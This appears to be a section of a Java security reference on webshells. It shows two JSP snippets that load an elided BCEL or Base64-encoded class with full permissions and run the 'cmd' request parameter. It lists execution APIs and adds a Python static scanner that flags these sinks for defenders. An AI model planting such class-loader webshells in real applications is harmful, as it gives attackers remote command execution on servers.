5.3.10. WebShell


5.3.10.1. BCEL Bytecode

String bcelCode = "...";
response.getOutputStream().write(String.valueOf(new ClassLoader().loadClass(bcelCode).getConstructor(String.class).newInstance(request.getParameter("cmd")).toString()).getBytes());

5.3.10.2. Custom Class Loader

response.getOutputStream().write(new ClassLoader() {
    @Override
    public Class<?> loadClass(String name) throws ClassNotFoundException {
        if (name.contains("shell")) {
            return findClass(name);
        }
        return super.loadClass(name);
    }

    @Override
    protected Class<?> findClass(String name) throws ClassNotFoundException {
        try {
            byte[] bytes = Base64.getDecoder().decode("...");
            PermissionCollection pc = new Permissions();
            pc.add(new AllPermission());
            ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null);
            return this.defineClass(name, bytes, 0, bytes.length, protectionDomain);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return super.findClass(name);
    }
}.loadClass("shell").getConstructor(String.class).newInstance(request.getParameter("cmd")).toString().getBytes());

5.3.10.3. Command Execution Variants

  • java.lang.ProcessBuilder
  • MethodAccessor.invoke
  • Method.invoke
  • TemplatesImpl

5.3.10.4. Other Shell Variants

  • ScriptEngine.eval
  • URLClassLoader
  • ToolProvider.getSystemJavaCompiler
  • jdk.nashorn.internal.runtime.ScriptLoader
  • ObjectInputStream.resolveClass
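
For defenders, a static triage pass over JSP sources can flag the API names listed in this section when they appear alongside request-controlled input. The following is an added example, not part of the original page: the function `scan_jsp`, its severity labels and the sample snippets are constructed for illustration, and the matching is a heuristic over source text only.

```python
import re

# Sink names come from the snippets and lists on this page, grouped by effect.
SINKS = {
    "class-loading": [r"\bdefineClass\s*\(", r"\bloadClass\s*\(", r"\bURLClassLoader\b",
                      r"\bresolveClass\b", r"\bTemplatesImpl\b", r"\bScriptLoader\b"],
    "command-exec": [r"\bProcessBuilder\b", r"\bMethodAccessor\b", r"\.invoke\s*\("],
    "dynamic-eval": [r"\bScriptEngine\b", r"\bgetSystemJavaCompiler\b"],
}
# Request-controlled input, as both snippets on this page read it.
SOURCE = re.compile(r"\brequest\s*\.\s*getParameter\s*\(")
# Traits of the custom class loader snippet: AllPermission, inline blob decoding.
ESCALATORS = [re.compile(r"\bAllPermission\b"),
              re.compile(r"Base64\s*\.\s*getDecoder\(\)\s*\.\s*decode")]

def scan_jsp(text):
    """Return (severity, hits); hits are (line, family, matched_text) tuples."""
    hits = []
    for family, patterns in SINKS.items():
        for pat in patterns:
            for m in re.finditer(pat, text):
                line = text.count("\n", 0, m.start()) + 1
                hits.append((line, family, m.group(0)))
    hits.sort()
    if not hits:
        return "none", hits
    if SOURCE.search(text):
        return "high", hits      # request input and a sink in the same file
    if any(p.search(text) for p in ESCALATORS):
        return "medium", hits    # no request input seen, but loader traits present
    return "low", hits           # sink alone: common in legitimate code

# Constructed samples for the demo (not taken from any real application).
SAMPLE_LOADER = """<%
byte[] b = Base64.getDecoder().decode(blob);
Class<?> c = defineClass(name, b, 0, b.length, pd);
out.print(c.getConstructor(String.class).newInstance(request.getParameter("q")));
%>"""
SAMPLE_BENIGN = """<%
String name = request.getParameter("name");
out.print(escapeHtml(name));
%>"""
SAMPLE_ADMIN = """<%
Process p = new ProcessBuilder("uptime").start();
%>"""

if __name__ == "__main__":
    for src in (SAMPLE_LOADER, SAMPLE_BENIGN, SAMPLE_ADMIN):
        print(*scan_jsp(src))
```

A "low" or "medium" result is a prompt for manual review, not a verdict; reflection and class loading also appear in legitimate framework code.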
